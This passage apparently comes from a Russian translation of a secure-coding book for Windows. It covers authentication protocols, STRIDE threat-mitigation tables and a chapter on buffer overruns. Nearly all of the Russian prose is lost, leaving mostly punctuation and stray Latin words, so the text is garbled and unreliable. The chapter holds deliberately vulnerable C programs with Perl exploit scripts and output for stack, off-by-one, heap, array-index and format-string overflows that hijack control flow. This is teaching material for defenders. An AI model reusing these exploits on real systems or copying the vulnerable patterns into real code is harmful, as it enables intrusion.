LogonUser. , Internet Information Services 6
(IIS 6) Passport 
, : , 
, Windows X.509.

Windows
Windows : NTLM
Kerberos. SSL/TLS, 
. Windows 
SSPI (Security Support Provider Interface).
SSP (Security Support Provider). Windows
SSP: NTLM, Kerberos, Schannel Negotiate. NTLM
, Kerberos 5, Schannel
SSL/TLS. 
Negotiate , 
, , Windows 2000,
NTLM Kerberos.
, SSPI,
(Jeffrey Richter) (Jason Clark) Programming ServerSide Appli
cations for Microsoft Windows 2000 (Microsoft Press, 2000) ( ., . .

96

Microsoft Windows 2000. 


. .:; .: , 2001).

NTLM-
NTLM Windows,
Windows CE. NTLM
Windows, , IIS,
Microsoft SQL Server Microsoft Exchange. NTLM. 2,
Windows NT SP 4,
1: (maninthemiddle).
, NTLM :
, .

Kerberos v5
Kerberos v5
(Massachusetts Institute of Technology, MIT) RFC 1510 (http://
www.ietf.org/rfc/rfc1510.txt). Windows 2000 Kerberos
Active Directory.
Kerberos , 
: . Kerberos ,
NTLM, .
Kerberos 
(service principal
names, SPN) : Designing
Secure Webbased Applications for Microsoft Windows 2000 (Microsoft Press, 2000)
(. , . , . Web
Microsoft Windows 2000. . : ; .: , 2001).

X.509
X.509 SSL/TLS.
Web SSL/TLS HTTPS, HTTP, 
SSL/TLS
. , , 
, . 
, , ,
.
, SSL/TLS 
. ,
SSL/TLS
. ,
X.509,
, .

,
. Windows 2000/XP 
 . Windows
.

97

X.509, ,
Designing Secure Webbased Applications for
Microsoft Windows 2000 (Microsoft Press, 2000) (. , . , . 
Web Microsoft Windows 2000.
. : ; .: , 2001).

,
, (, Web, 
LDAP) ,
, .
,
, NetBIOS \\Northwind, DNS http://www.
northwindtraders.com IP 172.30.121.14. .
DNS,
. , , 
.

IPSec
IPSec , 
. Kerberos
, IPSec
. IPSec 
, :
( ). Windows 2000/XP 
IPSec.

RADIUS
, Microsoft Internet Authentication Service (IAS), 
RADIUS (Remote Administration DialIn User Service)
 , RFC 2058.
Windows 2000 
Active Directory.


, , 
. ,

. ,
.
Windows , :
(Access control lists, AL);
;
IP;
.

98


Windows NT/2000/XP ACL.
ACL (access control entries, ACE), 
,
. , (Blake) 
, (Cheryl) , 
.

ACL 6.

, , 
, ,
, . 

.

7.

IP-
IP (IP restrictions) IIS,
Web (, )
Web, IP,
DNS.



. , Microsoft SQL Server , 
, 
. , COM+, , 
,
. , 
.




, . 

, , . ,
10 , , 
, 20.
, .
Windows 
:

99

SSL/TLS;
IPSec;
DCOM RPC;
EFS.

SSL/TLS
SSL Netscape 90.
, ,
MAC (Message Authentication Code) . TLS
SSL, IETF (Internet Engineering Task Force).

IPSec
, IPSec , 
MAC .
IPS .
IPSec 
, IPSec IP TCP/IP.

DCOM RPC
DCOM RPC ,
. ,
DCOM RPC .
16.

EFS
Windows, 2000, EFS (Encryp
ting File System) , 
NTFS. SSL, TLS, IPSec DCOM/RPC ,
EFS .

,
.
. , 
, !
 , . 
, 6.

, , MAC-
, 
. 
. 
, , . 
( )
, . 128
160 . ,
, .

100

, , ,
. 
, . , . 

, MAC .
MAC 
, 
( ). MAC 
,  .
MAC, , ,
, .
MAC,
; , 
, .
,
, ,
. , 
, , .
Windows API CryptoAPI (Crypto
graphic API) , ,
MAC .
, 
8.

, (logging),
, 
,

. Windows Windows, Web
IIS , SQL Server Exchange.
! . 
, 
, ,

.

,

(filtering)
. 

101

, 
, IP.
(throttling), , 
, 
. , 
, . 
.
(quality of service) 
, . 
, .


,
. 7 .

,

. 412 .

4-12. ,

STRIDE

SSL/TLS ( IPSec)


Web
Web


Web. 
ACL, 
Web 


IP. 
, 
( ,
,
..). ,

TI


SSL/TLS DCOM/RPC

.

. SSL/TLS MAC
.

DCOM/RPC .
IPSec

. . .

102

4-12.

()

STRIDE


.


Web

SSL/TLS,

, 
. 

.
: Kerberos, 

,
. .
! . 
, 
,
.


. 413 ,
,
. , 
.
,
.
.

4-13.



HTTP

TI

SSL/TLS, WTLS (
TLS)
IPSec


HTTP


.
IPSec 
.


.


4-13.

103

()



RPC DCOM

TI


. 


TI

PGP (Pretty Good Privacy) PGP 


S/MIME (Secure/
. S/MIME
Multipurpose Internet

Mail Extensions)

,



PIN 



PIN

PIN!


, ,
IP.


IP


. 


S, I



DoS,
, 

, 


. 


,
15 .







cookie

cookie

Web 

cookie

MAC
cookie

Web 


. . .

104

4-13.

()

, 



.
,

,


.

9



,
SSL/TLS,
IPSec Kerberos


HTML



Web



,

Web.

10



. 

, 
, 


. 


.


(replay)

T, R, I D




.
 !
(
SSL/TLS, IPSec
RPC/DCOM) 
.


.



 
MAC. 

4-13.

105

()

T, I D


, 

SeDebugPrivilege

S, T, R I,
DE

.







.





Windows NT.
,

,
23

S, T, R I,
DE



,
.
ACL 



,




.

,





,

TI


,

,



SSL/TLS IPSec



Web

TI

,

EFS.



.
EFS 
, 

106

,
. , 
, . 

:
. , ,
, .
, 
, ,
.
: ,
(, DFD), 
STRIDE, 
, DREAD,
STRIDE.
, , 
. Microsoft 
,
.

I I

5
1:

. 
60.
, . (Robert T. Morris) 1988 . 
, 
, . 2001 ., 
, buffer, security
bulletin Microsoft Knowledge Base (http://search.support.microsoft.com/
kb) 20 , , ,
. 
BugTraq (http://www.securityfocus.com)

, .
,
. Microsoft (Microsoft
Security Response Center) , 
100 000 , .

. 
. , 
 .
, 
,
. 
, ,

5 1:

109

. , . , ,
.
(
C C++, 
), 
. 
Windows (Windows Security Push)
2002 . Microsoft .
. 
, ,
. 
Strsafe.h.
, BASIC (
Visual Basic, BASIC, 
), Java, Perl, C# 
,
.
C ++.
++, , 
, ++.
, 
. , , . ,
, .
, 
buffer overrun. ! 
, , . 
,
, .
. 
,
, , : ,
, . , 
: . .
. ,  
.
, 
,
ANSI Unicode.
, . 
,
.


, , 
, , 
. 

110

II

, .
,
strcpy. 
. , ,
 ,
(command shell) . 
, : 
 ,
. ,
, .
, 
. (
, , 
.) . 
, 
.

/*
StackOverrun.c
,
.
, bar.
*/

#include <stdio.h>
#include <string.h>
void foo(const char* input)
{
char buf[10];
// ? printf?
// 8!).
// , .
printf(" :\n%p\n%p\n%p\n%p\n%p\n% p\n\n");
// "" " #1".
strcpy(buf, input);
printf("%s\n", buf);
printf(" :\n%p\n%p\n%p\n%p\n%p\n%p\n\n");
}
void bar(void)
{
printf("! !\n");
}
int main(int argc, char* argv[])

5 1:

111

{
// , .
printf(" foo = %p\n", foo);
printf(" bar = %p\n", bar);
if (argc != 2)
{
printf(" !\n");
return !1;
}
foo(argv[1]);
return 0;
}
Hello, World!. 
foo
bar. %p printf. 
, ,
foo, ,
DLL.
bar. foo printf,
,
. , foo 
10 .

. , 
,
, 
, 
malloc. 
, .
,
(Release) .
Microsoft Visual C++ 
,
. , Visual C++
Release. , 
:

C:\Secureco2\Chapter05>StackOverrun.exe Hello
foo = 00401000
bar = 00401045
:
00000000
00000000
7FFDF000
0012FF80
0040108A < , foo.

112

II

00410EDE
Hello
:
6C6C6548 < , "Hello".
0000006F
7FFDF000
0012FF80
0040108A
00410EDE
:

C:\Secureco2\Chapter05>StackOverrun.exe AAAAAAAAAAAAAAAAAAAAAAAA
foo = 00401000
bar = 00401045
:
00000000
00000000
7FFDF000
0012FF80
0040108A
00410ECE
AAAAAAAAAAAAAAAAAAAAAAAA
:
41414141
41414141
41414141
41414141
41414141
41414141
(. 51), , ,
0x41414141, 
0x41414141.

. 51.

: ,
Dr. Watson. ASCII 
, 0x41 A. ,
. ! , ,
, ,
. .

5 1:

113

,

. ,
, .
:
. ,
. ,
, 
, .
, 
, 
. , ,
. ,
, 
exploit.
,  
, , 
. ! 
, ! 
: 
, 
. , 

 .
, , 

. ,
.
. .
, , 100 
.
,
, , ,
. , ,
. , 
, , ,
. , .
, 
. .
, , 
.

! . 
!

114

II

, .
:

C:\Secureco2\Chapter05>StackOverrun.exe ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
foo = 00401000
bar = 00401045
:
00000000
00000000
7FFDF000
0012FF80
0040108A
00410EBE
ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
:
44434241
48474645
4C4B4A49
504F4E4D
54535251
58575655
,
0x54535251. ASCII, 0x54 T. 
:

C:\Secureco2\Chapter05>StacOverrun.exe ABCDEFGHIJKLMNOPQRS
foo = 00401000
bar = 00401045
:
00000000
00000000
7FFDF000
0012FF80
0040108A
00410ECE
ABCDEFGHIJKLMNOPQRS
:
44434241
48474645
4C4B4A49
504F4E4D
00535251
00410ECE
, ! , 
, .
,

5 1:

115

! , , 0x45, 0x10, 0x40 


QRC, bar.
? ( 0x10 
.) , Hack
Overrun.pl Perl,
:

$arg = "ABCDEFGHIJKLMNOP"."\x45\x10\x40";
$cmd = "StackOverrun ".$arg;
system($cmd);
, :

C:\Secureco2\Chapter05>perl HackOverrun.pl
foo = 00401000
bar = 00401045
:
77FB80DB
77F94E68
7FFDF000
0012FF80
0040108A
00410ECA
ABCDEFGHIJKLMNOPE?@
:
44434241
48474645
4C4B4A49
504F4E4D
00401045
00410ECA
! !
, ? .
16 
. , 
, , .
: 
( U.S. English) .
, 
. ,
. ,
Perl bar.
, Visual C++ .NET 
/GC, . ( 
/GC !) /GC 
.

116

II

,
(offbyone error). , 
.

/*
OffByOne.c
*/
#include <stdio.h>
#include <string.h>
void foo(const char* in)
{
char buf[64];
strncpy(buf, in, sizeof(buf));
buf[sizeof(buf)] = '\0'; //!!! !
printf("%s\n", buf);
}
void bar(const char* in)
{
printf("! !\n");
}
int main(int argc, char* argv[])
{
if(argc != 2)
{
printf(": %s [string]\n", argv[0]);
return !1;
}
printf(" foo %p, bar %p\n", foo, bar);
foo(argv[1]);
return 0;
}
 strncpy
sizeof . ,
, . ,
Release . 
C/C++ Debug Information
Format , , , 
. Visual Stu
dio .NET, /GC /RTC,
. Linker () 
. 
A ,
foo .
, Registers EBP
.

5 1:

117

foo. Memory buf. 


strncpy A, ,
buf, EBP. 
, null
, EBP
0x0012FF80 0x0012FF00 ( Visual C++ 6.0,
). ,
, 0x0012FF00, 0x41414141!
printf, (step over),
.
Registers , . ret
pop ebp. , EBP
. main,
, , , mov esp,ebp.
EBP ESP, ,
! ret,
0x41414141. 
!
, , 
. ,
. , , 
Perl. , :

$arg = "AAAAAAAAAAAAAAAAAAAAAAAAAAAA"."\x40\x10\x40";
$cmd = "off_by_one ".$arg;
system($cmd);
:

foo 00401000, bar 00401040


AAAAAAAAAAAAAAAAAAAAAAAAAAAA@?@
! !
, , 
. , ,
EBP. 
, , EBP,
EBP 0xF0 240 ,
,
ESP. 
. : Apache mod_ssl offbyone
wuftpd glob. http://online.securityfocus.com/
archive/1/279074 ftp://ftp.wuftpd.org/pub/wuftpdattic/cert.org/CA200133 
.
64 Intel Itanium
, . ,

.

118

II


, , 
.
, 
, . 
w00w00 on Heap Overflows (w00w00 ).
, (Matt Conover), w00w00 Security Development
(WSD), http://www.w00w00.org/files/articles/heap
tut.txt. WSD , 
,
. , 
:
, 
, ,
;
,
. , StackGuard,
(Grispin Cowan) , , 
( ,
),

. Visual C++ .NET
. 
;

.  
,
.
UNIX, ,
Windows . Windows
, 
. , w00w00,
BugTraq (http://www.securityfocus.com/archive/1/71598)
Solar Designer:
: BugTraq
: Netscape, 
JPEG COM
: 25 2000 , 04:56:42
: Solar Designer <solar@false.com>
: <200007242356.DAA01274@false.com>
[ ]

5 1:

119


malloc (Doug Lea) (
Linux, libc5, glibc),
(locale) 8 
( , 
glibc, en_US ru_RU.KOI8R).

: ( ), 

. 0 ,
(LSB

).
, , 
free(3) 
.
[ ]
, Linux/
x86. .
, Win32 
( ntdll!RtlFreeHeap).
http://www.blackhat.com/presentations/winusa02/halvarflake
winsec02.ppt (Halvar Flake)
.
:

/*
HeapOverrun.cpp
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/*

*/
class BadStringBuf
{
public:
BadStringBuf(void)
{
m_buf = NULL;
}

120

II

~BadStringBuf(void)
{
if(m_buf != NULL)
free(m_buf);
}
void Init(char* buf)
{
// !
m_buf = buf;
}
void SetString(const char* input)
{
// .
strcpy(m_buf, input);
}
const char* GetString(void)
{
return m_buf;
}
private:
char* m_buf;
};
// BadStringBuf,
// .
BadStringBuf* g_pInput = NULL;
void bar(void)
{
printf("! !\n");
}
void BadFunc(const char* input1, const char* input2)
{
// , ,
// .
char* buf = NULL;
char* buf2;
buf2 = (char*)malloc(16);
g_pInput = new BadStringBuf;
buf = (char*)malloc(16);
// .
g_pInput!>Init(buf2);

5 1:

121

// , , ???
strcpy(buf, input1);
g_pInput!>SetString(input2);
printf(" 1 = %s\n 2 = %s\n",
buf, g_pInput !>GetString());
if(buf != NULL)
free(buf);
}
int main(int argc, char* argv[])
{
// argv
char arg1[128];
// bar.
// , Intel
// (little endian).
char arg2[4] = {0x0f, 0x10, 0x40, 0};
int offset = 0x40;
// 0xfd ! ,
// .
// 0xfd .
// ,
// .
memset(arg1, 0xfd, offset);
arg1[offset] = (char)0x94;
arg1[offset+1] = (char)0xfe;
arg1[offset+2] = (char)0x12;
arg1[offset+3] = 0;
arg1[offset+4] = 0;
printf(" bar is %p\n", bar);
BadFunc(arg1, arg2);
if(g_pInput != NULL)
delete g_pInput;
return 0;
}
Secureco2\Chapter05. , 
main. ,
, . 
. ,
, , BadFunc 
.

122

II

, BadFunc ,
, ,
, . C++,
BadStringBuf, .

. , 
malloc, free .
, .
. , 
,  , 
( ) ,
. 
. 
? ,
,
? ,  
, , ,
0x40 .
,
!
, bar, 
, 0x0012fe94,
,
BadFun. , 
, Visual C++ 6.0, 
Release
. ,
0x0012fe94 bar.
: , .
, :

bar 0040100F
1 = ????????????????????????????????????????????????????????o57
2 = 64@
! !
,
Visual C++ !
, 

, . Solar Designer 
, ,
, 
.

. , 
, (, )
, . : 

5 1:

123

, 
.

, 
, , , , .
,
. .


, , 
. ,

? , 
,
, . .
, ,
:

/*
ArrayIndexError.cpp
*/
#include <stdio.h>
#include <stdlib.h>
int* IntVector;
void bar(void)
{
printf("! !\n");
}
void InsertInt(unsigned long index, unsigned long value )
{
// ,
// 64 ,
// unsigned short
// .
printf(" %p\n", &(IntVector[index]));
IntVector[index] = value;
}
bool InitVector(int size)
{
IntVector = (int*)malloc(sizeof(int)*size);
printf(" IntVector: %p\n", IntVector);

124

II

if(IntVector == NULL)
return false;
else
return true;
}
int main(int argc, char* argv[])
{
unsigned long index, value;
if(argc != 3)
{
printf(": %s [index] [value]\n");
return !1;
}
printf(" bar %p\n", bar);
// 64 <g>.
if(!InitVector(0xffff))
{
printf(" !\n");
return !1;
}
index = atol(argv[1]);
value = atol(argv[2]);
InsertInt(index, value);
return 0;
}
ArrayIndexError.cpp Secureco2\Chapter05. 
, ,
, 
, .
.
0x00510048, , 
( ), ,
0x0012FF84. , 
, ,
:

= + * sizeof()
, :

0x10012FF84 = 0x00510048 + < > * 4


, 0x0012FF84 0x10012FF84.
, . Calc.exe,
, () 0x3FF07FCF, 1072725967,

5 1:

125

bar (0x00401000) 4198400 . 


:

C:\Secureco2\Chapter05>ArrayIndexError.exe 1072725967 4198400


bar 00401000
IntVector 00510048
0012FF84
! !
, , 
. 
(truncation error), .
32 0x100000000 0x00000000.
,
, , 
(, ). 
, 
, , 
. ,
, 
, 
.

. UNIX (ID) root (
) . ( Windows) 
ID (signed integer), ,
, (unsigned
short). (User
ID, UID) 0x10000, ,
0x0000, (root) 
, ID 0. , 
.
20. 
,
, 
. ,

, 20.


, 
, .
, ,
. BugTraq:
(http://www.securityfocus.com/archive/1/81565) (Tim Newsham),
(http://www.securityfocus.com/archive/1/66842) (Lamagra

126

II

Argamal). (David Litchfield)


(http://www.nextgenss.com/papers/win32format.doc).
, , ,
, 
. ( ,
, C, 
printf.) %n
, . 
, ,
, . 2000 2001 . UNIX
UNIX ,
.
Windows.
Windows ,
, , 
0x00ffffff , , 0x00120000.
.
0x01000000 0x7fffffff.
: printf 
. , printf(<_>)
, printf(%s, <_>) . .

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
typedef void (*ErrFunc)(unsigned long);
void GhastlyError(unsigned long err)
{
printf(" ! ! err = %d\n", err);
// .
// , "" X Window,
// .
// main, .
exit(!1);
}
void RecoverableError(unsigned long err)
{
printf("! , , , ! err = %d\n",
err);
}
void PrintMessage(char* file, unsigned long err)
{
ErrFunc fErrFunc;

5 1:

char buf[512];
if(err == 5)
{
//
fErrFunc = GhastlyError;
}
else
{
fErrFunc = RecoverableError;
}
_snprintf(buf, sizeof(buf)!1, " %s", file);
// , ,
printf("%s", buf);
// , !
printf("\n fErrFunc ! %p\n", &fErrFunc);
// ! ""!
// .
fprintf(stdout, buf);
printf("\n ErrFunc: %p\n", fErrFunc);
fErrFunc(err);
}
void foo(void)
{
printf("! !\n");
}
int main(int argc, char* argv[])
{
FILE* pFile;
// ,
printf(" foo ! %p\n", foo);
//
pFile = fopen(argv[1], "r");
if(pFile == NULL)
{
PrintMessage(argv[1], errno);
}
else
{
printf(" %s\n", argv[1]);

127

128

II

fclose(pFile);
}
return 0;
}
. ,
, PrintMessage, , 
(
), . PrintMessage
.
printf, exploit
, . , ,
foo.
:

C:\Secureco2\Chapter05>formatstring.exe not_exist
foo ! 00401100
not_exist
fErrFunc ! 0012FF1C
not_exist
ErrFunc: 00401030
! , , , err = 2
:

C:\Secureco2\Chapter05>formatstring.exe %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%
x%x%x%x%x%x%x%x
foo ! 00401100
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
fErrFunc ! 0012FF1C
14534807ffdf000000000000000012fde8077f516b36e6e6143662
0746f20646e69782578257825782578257825782578257825782578257825
ErrFunc: 00401030
! , , , ! err = 2
! , .
7825 %x ,
(little endian). 
.
. Perl
, $arg. 

$arg:

#
# $arg
# exploit!
# %p 0x67666500

5 1:

129

# , ,
# 0x00656667
$arg = "%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%x%x%x%x%x%x%x%x%x%p"."ABC";
# $arg
# $arg = "......%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%p"."ABC";
# ! ErrFunc
# $arg = ".....%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%hn"."\x1c\xff\x12";
# ,
# exploit!
# $arg = "%.4066x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%hn"."\x1c\xff\x12";
$cmd = "formatstring ".$arg;
system($cmd);
ABC %x 
%p. , 
%x  :

C:\Secureco2\Chapter05>perl test1.pl
foo ! 00401100
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%x%x%x%x%x%x%x%x%x%x%x%pABC
fErrFunc ! 0012FF1C
70005c6f00727[]782578257025782500434241ABC
%x, 00434241ABC.
, %p, ABC.
.
exploit, Perl, 
ABC \x1c\xff\x12, ,
fErrFunc! , ErrFunc
.
(.) 
%x. , 00434241ABC,
, 
4 , %x ,
%p , . exploit
:

C:\Secureco2\Chapter05>perl test.pl
foo ! 00401100

130

II

......%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%pABC
fErrFunc ! 0012FF1C
......70005c6f00727[...]8257025782500434241ABC
45 
, . , 
, %hn 16 ,
%p.  ( 
h), ABC \x1c\xff\x12 .
, , :

C:\Secureco2\Chapter05>perl test.pl
foo ! 00401100
.....%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%hn? ?
fErrFunc ! 0012FF1C
.....70005c6f00727[]78257825786e682578? ?
ErrFunc: 00400129
, . :
ErrFunc! ,
foo 0x00401100, ErrFunc 0x00400129,
foo 4055 , . , ,
.4066 %x, !
test.pl :

ErrFunc 00401100
! !
,
. 2 , .
, 
,
. . 
, 
, . , ,
.


Unicode ANSI
, 
, ANSI Unicode,
Windows. , 
. . Windows NT ( ) 
ANSI, Unicode, Unicode
,
(wide), , .

5 1:

131

 
MultiByteToWideChar,
(). :

BOOL GetName(char *szName)


{
WCHAR wszUserName[256];
// ANSI Unicode.
MultiByteToWideChar(CP_ACP, 0,
szName,
!1,
wszUserName,
sizeof(wszUserName));
M
}
? .
MultiByteToWideChar. , 
, lpWideCharStr.
sizeof(wszUserName), 256, ? .
wszUserName Unicode, 256 , 
. sizeof(wszUserName)
512 . , , 512 
. wszUserName ,
.
:

MultiByteToWideChar(CP_ACP, 0,
szName,
!1,
wszUserName,
sizeof(wszUserName) /
sizeof(wszUserName[0]));
, :

#define ElementCount(x) (sizeof(x)/sizeof(x[0]))


, Unicode
ANSI: .
MultiByteToWideChar , ,
. , (canoni
calization) , .
! %S, 
printf ( ) , 
, ,
Unicode , .

132

II

, Unicode
, IPP (Internet Printing
Protocol), Unicode. MS0123 (http://www.micro
soft.com/technet/security). IPP ISAPI
IIS 5 (Internet Information Services), ; 
,
. IIS. :

TCHAR wszComputerName[256];
BOOL GetServerName(EXTENSION_CONTROL_BLOCK *pECB) {
DWORD dwSize = sizeof(wszComputerName);
char
szComputerName[256];
if (pECB!>GetServerVariable (pECB!>ConnID,
"SERVER_NAME",
szComputerName,
&dwSize)) {
// ! .
}
ISAPI GetServerVariable dwSize 
szComputerName. dwSize 512, TCHAR ,
Unicode. 
, 512 szComputerName, 
256 . !
, , ANSI
Unicode, . null,
? (Chris Anley) (http://www.nextgenss.com/papers/
unicodebo.pdf) , . , ,
, , , Intel
. 
Unicode
. , ,  
, .


! 
,
.
(Steve Maguire) Writing
Solid Code ( ) (Microsoft Press, 1993).
.
, , 
. , 
,
, . 
, :

5 1:

133

void PrintLine(const char* msg)


{
char buf[255];
sprintf(buf, " %s \n", msg);
M
}
, , , 
, , ,
. , , , 
, .
.
, ,
.
Microsoft. 
.
, :

#ifdef _DEBUG
memset(dest, 'A', buflen); //buflen =
#endif

, . 
, . ,
, 
, .
,
Strsafe.h; .


,

. , ,
. 
, lstrcpy, lstrcat lstrcpyn, Windows,
Windows , StrCpy, StrCat
StrCpyN ( Shlwapi.dll). lstr 
, 
( , LPTSTR), 
, ANSI. 
, , strsafe.

strcpy
, ,
. :

char *strcpy( char *strDestination, const char *strSource );

134

II

, , 
. null,
.  
null, , 
, null. 
, . 
, 
.
strcpy:

/* , strcpy . */
bool HandleInput(const char* input)
{
char buf[80];
if(input == NULL)
{
assert(false);
return false;
}
//
//
//
//
//
//

strlen , null.
: strlen, sizeof size_t,
.
, , size_t
, 20
.

if(strlen(input) < sizeof(buf))


{
// .
strcpy(buf, input);
}
else
{
return false;
}

// .
return true;
}
, ,
null, , , .
, strcpy
. , , 
, .
strcpy. , , 

5 1:

135

, , , .
, strcpy , 
.
:

#define strcpy Unsafe_strcpy


strcpy
. strsafe
, :

#define STRSAFE_NO_DEPRECATE
,
, . ( 
2001 ., .) 

, 
. strcpy, , .

strncpy
, . :

char *strncpy( char *strDest, const char *strSource, size_t count );



null ;
.
count. ,  
null, . 
: ,  
null. (, lstrcpyn .)
, , 
, , ,  
,  . strncpy
 , . 
.
:

/* , strncpy,
. */
bool HandleInput_Strncpy1(const char* input)
{
char buf[80];
if(input == NULL)
{
assert(false);
return false;
}

136

II

strncpy(buf, input, sizeof(buf) ! 1);


buf[sizeof(buf) ! 1] = '\0';
// .
return true;
}
, input buf 
. sizeof. 
,
. , 
null . , 
, .
strncpy , 
, .
, ; ,
. . ! 
, .
, , 
. : ? 
, ,
. [ The Tao of Programming (
) (Info Books, 1986) (Jeffrey James), 
.] , :

/* strncpy.
, null. */
bool HandleInput_Strncpy2(const char* input)
{
char buf[80];
if(input == NULL)
{
assert(false);
return false;
}
buf[sizeof(buf) ! 1] = '\0';
//
// ! (pragma),
// , , sizeof(buf),
// sizeof(buf) .
strncpy(buf, input, sizeof(buf));
if(buf[sizeof(buf) ! 1] != '\0')
{

5 1:

137

//!
return false;
}
// .
return true;
}
HandleInput_Strncpy2 . 
null , strncpy 
, sizeof(buf) 1 . ,
, null 
, ; 
.

sprintf
sprintf strcpy .
. :

int sprintf( char *buffer, const char *format [, argument] ... );


, sprintf , 
. :

/* sprintf */
bool SprintfLogError(int line, unsigned long err, char* msg)
{
char buf[132];
if(msg == NULL)
{
assert(false);
return false;
}
// sprintf???
sprintf(buf, " %d = %d ! %s\n", line, err, msg);
// ,
// .
return true;
}
, ? msg
null, SprintfLogError, , . 
21 . err
10 , line 11 . (
, .) ,
msg 89 .
, 
. sprintf . , 
, :

138

II

if(sprintf(buf, " %d = %d ! %s\n",


line, err, msg) >= sizeof(buf))
exit(!1);
. 

! 
, .
, , .  
sprintf, 
. ( .) (NUL) 
, fopen, fprintf , 
fprintf, , . 
, . 
printf _output, , 
, ,
.

_snprintf
. :

int _snprintf( char *buffer, size_t count, const char *format [, argument] ... );
_sprintf, .
:

/* _snprintf */
bool SnprintfLogError(int line, unsigned long err, char * msg)
{
char buf[132];
if(msg == NULL)
{
assert(false);
return false;
}
// null!
// ?
if(_snprintf(buf, sizeof(buf)!1,
" %d = %d ! %s\n", line, err, msg) < 0)
{
// !
return false;
}
else
{
buf[sizeof(buf)!1] = '\0';
}
// ,
// .

5 1:

139

return true;
}
, , ,
: _snprintf , 
null ,
Microsoft C, .
, C,
ISO C99. _snprint (, ,
), ,
. : 
, , ,
, null. 
, 
, , ;
. 
, , 
, null. 
null.

. strcpy, strcat ( ),
strncat , , 
, . _snprint 
.  
_snprint strncpy 
strncat. ,
.

Standart Template Library


Standart Template Library (STL) , 
C++. STL
. C 
C++. :

/* STL */
#include <string>
using namespace std;
void HandleInput_STL(const char* input)
{
string str1, str2;
// , ,
// null.
str1 = input;
// , null, :
str2.append(input, 132);
// 132 == , .

140

II

// .
// .
printf("%s\n", str2.c_str());
}
! :

string s1, s2;


s1 = "foo";
s2 = "bar"
// s1 "foobar"
s1 += s2;
STL
 .
Unicode. CString MFC (Microsoft
Foundation Classes) . , STL

. , STL NULL 
. . , inet_ntoa 
, . 
NULL.
, Microsoft
string . 
, 
, , 
string.
, string  UserInput.
, , 
.

gets fgets

gets. :

char *gets( char *buffer );


, . stdin,
. , 
. fgets
stream C++.

Strsafe.h
Windows (Windows Security Push)
2002 . ,
,
. , (
SDK):

5 1:

141

 , 
;
null, 
;
HRESULT 
S_OK;
:
(cch) (cb);
(Ex) ,
.

Strsafe.h Secureco2\Strsafe.

, . , 
. , sizeof msize.
, strncat, ,

. null
, , , , 
. , . 
null.
 . , 
, strncpy? ,
;  , 
.
,
ANSI Unicode ,  ,
, . 
, strsafe : 
, . ,
, ; 
STRSAFE_NO_CB_FUNCTIONS STRSAFE_NO_CCH_FUNCTIONS.
, ,
, . :
STRSAFE_FILL_BEHIND_NULL ,
. , ,
, ;
STRSAFE_IGNORE_NULLS null . 
lstrcpy;
STRSAFE_FILL_ON_FAILURE 
;
STRSAFE_NULL_ON_FAILURE
;
STRSAFE_NO_TRUNCATION .
, .

142

II

.
, , 
. 
, ( ), 
, .
Strsafe.h : STRSAFE_NO_
DEPRECATE, !
:
, , 
.
, . 
, , , 
, .
Web http://msdn.microsoft.com/library/enus/winui/winui/windowsuserinter
face/resources/strings/usingstrsafefunctions.asp.

C strsafe:

// CRT!
void UnsafeFunc(LPTSTR szPath,DWORD cchPath) {
TCHAR szCWD[MAX_PATH];
GetCurrentDirectory(ARRAYSIZE(szCWD), szCWD);
strncpy(szPath, szCWD, cchPath);
strncat(szPath, TEXT("\\"), cchPath);
strncat(szPath, TEXT("desktop.ini"),cchPath);
}
// strsafe
bool SaferFunc(LPTSTR szPath,DWORD cchPath) {
TCHAR szCWD[MAX_PATH];
if (GetCurrentDirectory(ARRAYSIZE(szCWD), szCWD) &&
SUCCEEDED(StringCchCopy(szPath, cchPath, szCWD)) &&
SUCCEEDED(StringCchCat(szPath, cchPath, TEXT("\\"))) &&
SUCCEEDED(StringCchCat(szPath, cchPath, TEXT("desktop.ini")))) {
return true;
}
return false;
}



,
strsafe, .
strsafe. ?

5 1:

143

char buff1[N1];
char buff2[N2];
HRESULT h1 = StringCchCat(buff1, ARRAYSIZE(buff1), szData);
HRESULT h2 = StringCchCat(buff2, ARRAYSIZE(buff1), szData);
StringCchCat. 
: buf2 , buf1. :

char buff1[N1];
char buff2[N2];
HRESULT h1 = StringCchCat(buff1, ARRAYSIZE(buff1), szData);
HRESULT h2 = StringCchCat(buff2, ARRAYSIZE(buff2), szData);
C.
, strcpy strcat
strncpy strncat , , 
 . ?

#define MAXSTRLEN(s) (sizeof(s)/sizeof(s[0]))


if (bstrURL != NULL) {
WCHAR szTmp[MAX_PATH];
LPCWSTR szExtSrc;
LPWSTR szExtDst;
wcsncpy( szTmp, bstrURL, MAXSTRLEN(szTmp) );
szTmp[MAXSTRLEN(szTmp)!1] = 0;
szExtSrc = wcsrchr( bstrURL, '.' );
szExtDst = wcsrchr( szTmp , '.' );
if(szExtDst) {
szExtDst[0] = 0;
if(IsDesktop()) {
wcsncat( szTmp, L"__DESKTOP", MAXSTRLEN(szTmp) );
wcsncat( szTmp, szExtSrc
, MAXSTRLEN(szTmp) );
